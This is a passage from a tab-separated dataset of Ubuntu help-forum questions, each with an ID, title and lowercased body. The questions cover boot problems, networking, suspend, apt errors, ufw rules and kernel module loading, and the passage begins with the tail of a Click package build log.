starting status : finished transaction : installing files status : waiting in queue status : waiting for authentication status : waiting in queue status : starting status : finished results : installed com.ubuntu.developer.username.oweme-0.1.all ( installed : click , removable=1 , app_name=oweme ) application installed , executing registering hooks start application application started : 4572 received a failed event the application exited , cleaning up transaction : removing status : waiting in queue status : starting status : finished transaction : removing status : waiting in queue status : waiting for authentication status : waiting in queue status : starting status : finished results : and general output : [ 15:38:15 ] ii click-reviewers-tools 0.8-0~214~ubuntu14.04.1 and my compilation output : 16:28:56 : running steps for project oweme ... sending incremental file list deleting qtc_device_debughelper.py ./ oweme.desktop oweme.json sent 682 bytes received 89 bytes 1.54k bytes/sec total size is 46.47k speedup is 60.27 16:28:56 : the process `` /usr/bin/rsync '' exited normally . warning : root : ignoring missing framework `` ubuntu-sdk-14.10-dev2 '' successfully built package in './com.ubuntu.developer.username.oweme_0.1_all.click ' . 16:28:56 : the process `` /usr/bin/click '' exited normally . 16:28:56 : the click package has been created in /home/morgan/build-oweme-ubuntui386_gcc_i386_ubuntu_sdk_14_10_utopic-default 16:28:56 : connecting to device ... 16:28:57 : uploading file '/home/morgan/build-oweme-ubuntui386_gcc_i386_ubuntu_sdk_14_10_utopic-default/com.ubuntu.developer.username.oweme_0.1_all.click ' ... 16:28:57 : uploading file '/usr/share/qtcreator/ubuntu/scripts/qtc_device_applaunch.py ' ... 16:28:57 : all files successfully deployed . 16:28:57 : deploy step finished . 16:28:57 : elapsed time : 00:02 .
513835	how to implement middle click to spawn new vlc ?	using the firefox.desktop found in /usr/share/applications as an example i was able to make vlc have a new window option with ... other code actions=newwindow ; [ desktop action newwindow ] name=new window exec=/usr/bin/vlc onlyshowin=unity ; how can i make it so that whenever i middle click the icon it spawns a new window like chrome , nautilus , firefox , etc .
513837	wifi says connected but is n't	i have an acer c720 converted over to linux ( ubunto 14.4 ) . the wifi used to work but it wo n't work at my current hotel . it says i 'm connected though . password is correct . it just says that every page i go to is unavailable . if i boot the machine as a chromebook then i 'm fine and can access all . simarly if i use my nexus 7 then all 's ok. how can i find out what 's wrong ? mike
513840	google chrome proxy settings ?	when i try to set google chrome 's proxy settings ( on chrome : //linux-proxy-config/ ) , i get the following message : when running google chrome under a supported desktop environment , the system proxy settings will be used . however , either your system is not supported or there was a problem launching your system configuration . but you can still configure via the command line . please see man google-chrome-stable for more information on flags and environment variables . i need to set proxy settings to use chrome , but i do n't want to be setting them in the command line every time i use chrome . is there a way to set these settings permanently ? also , is there an option in chrome so that it does n't use proxy for specific domains ( analogous to the no proxy for setting in firefox ) ?
513844	installing ubuntu onto other hard drive	i am a total beginner to linux . i d/l a legit ubuntu 14.0 onto a memory stick , and want to install it onto a 160gb hdd i have attached to my pc running xp pro . i can launch the `` try me '' no problem , but when i try to fully install ubuntu , using the `` something else '' option , i am presented with a `` installation type '' screen . i have tried a number of combinations of response , but when i hit `` install now '' , i immediately get a warning screen telling me `` no root system is defined . please correct this from the partitioning menu '' . the drive was formatted on win xp as fat32 . can anyone please walk me through the setup ? thanks in advance .
513856	auto-enter master password in keepassx on launch	i use keepassx only for unimportant sites and it 's set up to autostart . entering password every time is quite annoying .
513857	how to get password working again after upgrade ?	installed ubuntu 14.04 , but my password does n't work now . this is on an hp laptop pc that accepted my password before the upgrade .
513860	how to prevent data from being written into a directory ?	or : how to make a directory write protected , for all users until unlocked again ?
513863	endless text loop while booting ubuntu	i installed ubuntu today ( using wubi ) and when booting , after grub screen there is text showing up rapidly . the text is looped . on the left side , it says starting ( and in line below it says stopping ) , after that there 's some text i ca n't read because it 's too fast , and on right there 's [ ok ] . also , in background there 's this pic http : //i.stack.imgur.com/1zex9.jpg rapidly appearing and disappearing . sometimes after some time the loop ends and i see login screen , but not always . please help , i do n't know why it is like that . ubuntu 14.04 , amd fx-6300 , 4gb ram
513864	ubuntu 14.04 after boot , there is no login box . before it was okay	today i try to boot my dell laptop , i use ubuntu 14.04 and since the latest update , it normaly boots up , but when there supposed to be the login box and the icons , there 's only the background and just some icons . ctrl+alt+f1 works i can login normaly then able to see everything . thanks for any answer .
513865	no windows option on boot	i 've installed ubuntu alongside windows but at first did n't have a boot option menu . so , i installed bootrepair and ran it . this succeeded in granting me a grub boot option menu , but windows is n't on it . here is the bootrepair report : http : //paste.ubuntu.com/8098527 can anyone tell me what might be wrong ? edit : i ran sudo fdisk -l and this is the output : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00023fe0 device boot start end blocks id system /dev/sda1 * 2048 960096255 480047104 83 linux /dev/sda2 960098302 976771071 8336385 5 extended /dev/sda5 960098304 976771071 8336384 82 linux swap / solaris disk /dev/sdb : 32.0 gb , 32015679488 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62530624 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 32 62530623 31265296 c w95 fat32 ( lba )
513867	the volume âfilesystem rootâ has only 0 bytes disk space remaining ?	i installed 14.04 two weeks ago and run into some strange troubles recently.it says the volume file system root has only 0 bytes disk space remaining.how to i increase the memory of that root disk and am not using any windows only am using ubuntu please any one help me how to increase the memory size of that particular drive ... ..thank you
513872	ubuntu server 14.04 stops booting after update from 13.10	sorry to ask if this issue already is solved , and please let me know . my ubuntu server 13.10 after updated to 14.04 past week , never more got booted . i 'll explain ; after upgrade i had to reboot , then the reboot stops at ( *stopping samba auto-reload integration ) and he never passes from that . how can i fix this ? dont know much of linux , i 'm a real newby . thaks in advance for who can help .
513873	how to transfer ubuntu to ssd , but keeping home on hdd ?	i would like to transfer my existing ubuntu trusty ( 14.04.1 ) system ( including installed apps from ppas ) to an ssd . i want to retain my existing home directory on hard disk ) . what is the best method , preferably ones that does n't involve reinstalling ubuntu ?
513876	standby problem , pc can not enter standby mode	i have a problem with the standby function : my computer does not enter the standby mode with ubuntu 14.04lts . if i remeber me right , it works with ubuntu 13.10 but this version was not long installed on this pc . now when i press standby in the menu or on my keyboard , the display turns black for a few seconds , then some messages appear for a very short moment on the screen . after that , the the log-in screen appear . two times i was able to enter standby but the other times it fails . tecnical data about my pc : ubuntu 14.04 with all updates main storage : 3,8gibprocessor : intel® core™ i3-2330m cpu @ 2.20ghz × 4 graphic : intel® sandybridge mobile graphic board : nvida geforce gt 555m cuda 1gb dual boot system with win7 x64bit medion p6812 laptop here is the message output : usally i got only a half or one third of the screen filled with messages like that . this time , when i filmed it , it was much more . here is the log from /var/log/pm-suspend.log : initial commandline parameters : wed aug 20 17:09:25 cest 2014 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status suspend suspend : /usr/lib/pm-utils/sleep.d/000record-status suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux leon-p6812 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux module size used by nls_iso8859_1 12713 1 dm_crypt 23177 1 hid_generic 12548 0 usbhid 52570 0 hid 106148 2 hid_generic , usbhid ctr 13049 0 ccm 17773 0 rfcomm 69160 0 bnep 19624 2 bluetooth 391196 10 bnep , rfcomm binfmt_misc 17468 1 rts5139 335409 0 arc4 12608 2 iwldvm 232285 0 mac80211 630653 1 iwldvm acer_wmi 32522 0 sparse_keymap 13948 1 acer_wmi intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 snd_hda_codec_hdmi 46254 1 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 snd_hda_codec_realtek 61438 1 cryptd 20359 1 ghash_clmulni_intel snd_hda_intel 52355 5 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel joydev 17381 0 snd_hwdep 13602 1 snd_hda_codec serio_raw 13462 0 snd_pcm 102099 4 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi lpc_ich 21080 0 iwlwifi 169932 1 iwldvm snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq cfg80211 484040 3 iwlwifi , mac80211 , iwldvm snd 69238 20 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd mei_me 18627 0 mei 82276 1 mei_me parport_pc 32701 0 mac_hid 13205 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc usb_storage 62209 1 nouveau 1097199 1 i915 783805 4 mxm_wmi 13021 1 nouveau psmouse 106678 0 ttm 85115 1 nouveau i2c_algo_bit 13413 2 i915 , nouveau ahci 25819 3 drm_kms_helper 53081 2 i915 , nouveau libahci 32560 1 ahci drm 303102 8 ttm , i915 , drm_kms_helper , nouveau atl1c 46086 0 wmi 19177 3 acer_wmi , mxm_wmi , nouveau video 19476 3 i915 , acer_wmi , nouveau total used free shared buffers cached mem : 3951564 3708976 242588 395912 49344 1329840 -/+ buffers/cache : 2329792 1621772 swap : 4092924 12240 4080684 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to non-global ctrl_ifname : ( null ) error : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . wed aug 20 17:09:25 cest 2014 : performing suspend sh : echo : i/o error wed aug 20 17:09:29 cest 2014 : awake . wed aug 20 17:09:29 cest 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : failed to connect to non-global ctrl_ifname : ( null ) error : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend : /etc/pm/sleep.d/10_grub-common resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave resume suspend : /usr/lib/pm-utils/sleep.d/00powersave resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging resume suspend : /usr/lib/pm-utils/sleep.d/00logging resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status resume suspend : /usr/lib/pm-utils/sleep.d/000record-status resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : success . wed aug 20 17:09:30 cest 2014 : finished . output of lspci : leon @ leon-p6812 : ~ $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf116m [ geforce gt 555m/635m ] ( rev a1 ) 03:00.0 network controller : intel corporation centrino wireless-n 1030 [ rainbow peak ] ( rev 34 ) 04:00.0 ethernet controller : qualcomm atheros ar8151 v2.0 gigabit ethernet ( rev c0 ) 05:00.0 usb controller : texas instruments tusb73x0 superspeed usb 3.0 xhci host controller ( rev 02 ) maybe related to this unanswered question : standby mode ( suspend ) not working on my computer if someone needs more log comment . i dont know wich logs are necessary in this case . i dont know , maybe this is a bug . if this can be fixed , please help me !
513877	help configuring my samba file server	hello everyone i have installed all the files i needed for my samba file server . i have also installed the gadmin-samba 0.3.2 . i am trying to set a user-name and password also i would like to know how to ad my laptops i own to the machines allowed to connect to it . it can be in terminal but preferably in gadmin-samba which is like a gui . please be very descriptive my systems is ubuntu 14.04 and gadmin-samba 0.3.2
513878	how can i remove a unity window entry ?	i installed eclipse long time ago from the software center , but recently i needed a newer version than the repo one . then i removed it via software center and installed eclipse kepler in /opt . however , the window opened is not called eclipse , it is the name of an old program i made ( eclipse- gmm ) . however , that 's not the main issue , but that even if i created a .desktop file it launches the same , having `` two '' eclipses in the dock , the actual program and the launcher . how can i remove unity .desktop cache or wathever it is this ?
513879	why does n't lsof show localhost tcp connections in 14.04 ?	i have two servers running 12.04.4 and 14.04.1 respectively . both have nginx ( port 80 ) and a java process ( port 8080 ) . as expected , the lsof output for the java process ( sudo lsof -np -p $ pid ) on the 12.04 machine shows a couple of established connections for port 8080 ( e.g . tcp 127.0.0.1:8080- > 127.0.0.1:58067 ( established ) ) the 14.04 machine however does not . it only shows the listening port ( tcp *:8080 ( listen ) ) . i 'm sure there are active connections though ( confirmed by access logs , java process status output , etc ) . what has changed from 12.04 to result in this behavior ? can this change be the cause for the `` too many open files '' errors i 'm getting since moving from 12.04 to 14.04 ? 12.04 : $ dpkg -l lsof linux-image-virtual openjdk-7-jre nginx ||/ name version +++-===========================================-=========================================== ii linux-image-virtual 3.2.0.59.70 ii lsof 4.81.dfsg.1-1build1 ii nginx 1.6.1-1~precise ii openjdk-7-jre 7u65-2.5.1-4ubuntu1~0.12.04.1 14.04 : $ dpkg -l lsof linux-image-virtual openjdk-7-jre nginx-full ||/ name version architecture description +++-=====================================-=======================-======================= ii linux-image-virtual 3.13.0.32.38 amd64 ii lsof 4.86+dfsg-1ubuntu2 amd64 ii nginx-full 1.4.6-1ubuntu3 amd64 ii openjdk-7-jre : amd64 7u65-2.5.1-4ubuntu1~0.1 amd64
513880	why is my lan not working properly ?	i am using ubuntu 12.04 as my os . till yesterday , my lan was working fine , but after that my lan is not working properly . what i mean is that it shows that the lan wire is connected properly , but when i try to open a website it gets stuck on resolving host . i am using the web browser as google-chrome . now , when i manually switch off the wired connection and turn it on again , the lan works perfectly till i open one or two webpages . after that the same problem repeats again . can anybody , help me with a solution to this problem .
513884	how can i run tellme more software on ubuntu 14.04 lts ?	i 'm new to ubuntu and i 've been loving it so far , i have it on my 2 computers and i think everyone should try it . i run an english laboratory in a university ( our pc 's are old and slow ) so i want to install ubuntu on all of them so the students can have a better experience here , the problem is tha we need tell me more software which i believe it 's only for windiws . how can i install it in ubuntu ? do i need wine or a virtual machine with windows ? please help ! and thank you so much ! !
513886	using `` mtnl 3g jadoo '' data card on ubuntu	i am trying to use `` mtnl 3g jadoo '' data card ( teracom lw272 ) with ubuntu 12.04 . on connecting , it gets mounted as a drive containing the client installation .deb file . i opened the .deb file in ubuntu software center and installed it . i searched for `` mtnl '' in ubuntu search and found `` mtnl 3g modem '' application . but it wo n't run . i found it is installed in /opt/mtnl-3gmodem . i tried running it from the terminal as : sudo /opt/mtnl-3gmodem/modemclient , but no luck . any idea how to get it working ?
513888	i have problem and i cant install someone help me packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ?	i marked the problem i cant install with ubuntu center and synaptic i cant repair ! ! the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1 : 1.6.1-0ubuntu1 ppa1 ~ ~ precise1 ) but it is not installable e : unmet dependencies . try 'apt-get f install ' with no packages ( or specify a solution ) . 64 bit 12.04lts and tried update to ubuntu 14.04 but i cant update too..
513890	ubuntu 12.04 pxelinux does not boot rhel kernel and initrd	i have successfully setup pxe server on ubuntu 12.04 with dnsmasq for dhcp proxy service , tftpd-hpa for tftp service , nfs-kernel-server , apache2 and syslinux for pxelinux.0 bootloaded needed for pxe boot using the following post : http : //ubuntuforums.org/showthread.php ? t=1606910 i was successfully able to pxe boot a client to a ubuntu 12.04 live cd . next , i want to pxe boot a client to a rhel 6.5 x64 kernel and initrd image . i dont want to install , just boot a client so that it mounts initrd and i can get a minimal filesystem on the client . how can i do that ? please help ! !
513894	ufw - how can i open up a port to a range of ip 's ( ub 14.04 )	i wonder if you can help me . i want to open up a specific range of ips to port 22 , e.g from 32.46.23.113 to 32.46.23.126 , how would i do this with ufw ? i 've had a look at subnet masking and have seen that i can open up 32.46.23.113/24 but my understanding is that this would allow traffic from 32.46.23.127-32.46.23.255 , which i do n't want ideally your help and any explanation you can give as to how this works is much appreciated .
513896	software center not working	my software-center is not working . it closes itself automatically after loading itself one or 2 seconds . actually it shows some kind of attribute error in the terminal : line 281 , in contains return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute 'contains'
513901	not able to get a wired/wireless connection using ubuntu 14.04	i have a dell inspiron e1505 that was using ubuntu 12.04 with no problem after i made some changes to get wireless up and running . but after ubuntu 14.04 was installed from a dvd , the internet was unobtainable from wired or wireless . i 've tried several different fixes , have re-installed and nothing has worked . any help would be appreciated . ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:264 errors:0 dropped:0 overruns:0 frame:0 tx packets:264 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20800 ( 20.8 kb ) tx bytes:20800 ( 20.8 kb ) sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : efdfc000-efdfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff
513903	after installation ubuntu 14.04 does not start	i installed ubuntu 14 successfully , but at the end of the process when the system restart the following message appears and the system does not respond : wait-for-state stop/waiting stooping rsync daemon rsync speech-dispatcher disabled ; edit /etc/default/speech-dispatcher asking all remaining processes to terminate ... so i turn off and turn on the computer and the following message appears : gave up waiting for root device . common problems : boot args ( cat /proc/cdmline ) check rootdelay= ( did the system wait long enough ? ) check root= ( did the system wait for the right device ? ) missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/0f9e5ac7-8197-490f-9e6f-c051a1c4d85e does not exist . dropping to a shell ! busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) i write `` exit '' ( i do n't know why ) , i press enter , and the system continues booting , and launch the graphical interface . this happens every time i turn the computer on . i wish someone would help me to solve the problem . thanks ! ! ! this computer always had a single hard disk . i ran sudo blkid and i got this : /dev/sda1 : uuid= '' 0f9e5ac7-8197-490f-9e6f-c051a1c4d85e '' type= '' ext4 '' /dev/sda5 : uuid= '' 4b9b5bf7-75ae-4096-9a2c-52413ed26720 '' type= '' swap '' thank for your time , i appreciate your help !
513904	flash-plugin -- - canonical 's stance ? questions	i would like to find out or be pointed to ubuntu 's official policy regarding flash-plugins especially since adobe will not support ( is not supporting ) future upgrades to this product . i have perused the internet ad nauseam and can not find any definitive statement regarding what current ubuntu users need to know now and for the future regarding this issue . it seems every so-called solution to a flash-crash ends in a dead-end . questions : am i alone in suffering inconsistent adobe crashes ? whose `` ball court '' does this problem reside with ? adobe , linux , ubuntu , firefox is there a champion on the linux side ? is the html5 , shumway , flash replacement real ? is this a just a techno-political dilemma where i just need to suck it up and live with the crashes ?
513906	duplicated desktop , ubuntu 14.04 in vmware	i am operating ubuntu 14.04 through vmware player version 6.0.3 on a windows 7 os . yesterday , i installed gimp through the ubuntu software center . after opening a couple of jpegs to do some simple manipulation , ubuntu froze . nothing i tried could allow me to close programs or even react to a mouse click or key so i suspended the vm hoping that it would correct the problem upon resumption . when i did resume , the issue of freezing had indeed stopped but now my desktop within ubuntu is duplicated across the screen , the `` second '' version overlapping the first enough that in order to manipulate anything i have to drag it right and left to reach the links and buttons . i uninstalled gimp and have rebooted the machine several times . i 've done some web research and some previous versions of ubuntu seem to have had this issue related to the xorg.conf file . i do n't have a xorg.conf on this system and while i have found an x11 directory , the file that looks like a configuration : xvmcconfig does n't appear to be something editable . i 've tried altering the screen size in the display settings manager but that 's just made smaller or larger versions of the same problem . i 've run a different virtual machine from vmware to make sure it was n't a problem at that level and the other vm displays fine . any ideas ?
513907	upgrade list problem	when doing an upgrade with `` sudo apt-get upgrade '' i get the following error . this has always worked in the past . any help ? reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/za.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
513909	ubuntu 14.04lts restarts after shutdown	i 've had this issue after upgrading from 12.04lts : every time i try to shotdown my laptop ( hp probook 4540s , with dualboot win7/ubuntu14.04 ) it actually shuts down , but after few seconds ( 2-3 secs ) it restarts . as i expected booth the suspend and hibernate do not work . what i 've tried : give `` sudo shutdown - h now '' from terminal edit grub file as described here http : //www.unixmen.com/fix-shutdown-power-computer-ubuntu-14-04/ update grub disable wake on wlan and wake on usb from bios my laptop only shutdown if i hold the ( physical ) power button . ( notice that it shutdown correctly from win7 ) any advice will be truly appreciated !
513911	ubuntu 14.04 lts screen brightness asus g750js	i got a new asus g750js at the beginning of the summer and set it up for a windows 8.1 / ubuntu 14.04 lts dual boot . minus discovering that the windows 8 boot manager is completely broken , i had thought that there were no post-install issues . however , now i am finding out that neither the brightness bar in the system settings nor my brightness function keys are working in ubuntu . anyone know anything about fixing this ? thanks , ryan
513912	( 14.04 ) problem interacting with applications after opening gnome dashboard	recently i had to reinstall ubuntu 14.04/gnome and i noticed a really annoying problem . when i move my cursor to the top left to open my dashboard , i can click on a window but after it comes to the front i cant interact with it . should i just remove and install gnome again ?
513913	how to make my bluetooth keybord gtc ribbon works properly in ubuntu 14.04 ?	i conected my bluetooth keyboard to my laptop with ubuntu 14.04 and apparently it is conected but when i try to use it , it just lets me put numbers . the letter `` l '' in the number 1 , letter `` o '' is the number `` 5 '' and the same with the other numbers , the back space key works fine but the rest of the keys just do n't do anything . how can i fix it ? !
513914	how to add link buttons with label in quickly glade	i 'm making my own application , i can add link buttons on quickly glade , but the link buttons dont have a label , they just have `` button '' written on them . how can i add my own label on the link buttons ? thank you ! ! !
513915	ubuntu unable to update and upgrade to 14.04 : gpg error	i have been looking around the net for solutions but i just can not get rid of this error . sudo apt-get update ign http : //archive.canonical.com saucy inrelease ign http : //extras.ubuntu.com saucy inrelease ign http : //ppa.launchpad.net saucy inrelease get:1 http : //glug.nith.ac.in saucy inrelease get:2 http : //qgis.org saucy inrelease [ 3,187 b ] 100 % [ 1 inrelease gpgv 9,491 b ] [ waiting for headers ] [ waiting for headers ] [ wasplitting up /var/lib/apt/lists/partial/glug.nith.ac.in_ubuntu_archives_dists_sauign http : //glug.nith.ac.in saucy inrelease e : gpg error : http : //glug.nith.ac.in saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) edit : this particular error disappeared upon changing the server to the main ubuntu server . there were a few errors with 404 not found , and i removed those ppas from the software list . on a sidenote , i recently removed and purged qgis so do n't know what its doing there .
513918	kernel module loading order - that is module `` wl '' ( wireless ) load first , then `` b44 '' ( lan ) - how to enable this order when starting up ?	i have a old dell inspiron 1720 laptop which comes with a bcm4312 wirless card and bcm4401-b0 onboard lan . # lspci -vvnn | grep 14e4 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) i downloaded latest bcmwl kernel source in ubuntu and dkms built the modules . then , i noticed b44 module needs to be unloaded for the wl module to identify . later , loading b44 is fine . i am not aware of the systemd or upstart and such mechanisms . is there any option to manipulate the order , kernel modules gets loaded ?
513921	failing using a mobile broadband usb modem	i get the following notice on the screen : '' your current network has a .local domain which is not recommended and incompatible with the avahi network service discovery . the service has been disabled . '' it looks like the modem has been detected because i can see that there is a connection with the internet but no website is coming up . i have ubuntu 14.04 installed
513924	server backup to github	is it somehow possible to backup a whole server on github from the command line ? something like : cd / git commit username/repos -patch master i know it might not be this easy , cause it might need to turn the whole server into a git , and then also require a login for github and so on . but is this possible to do ? and would it be a good or bad idea ?
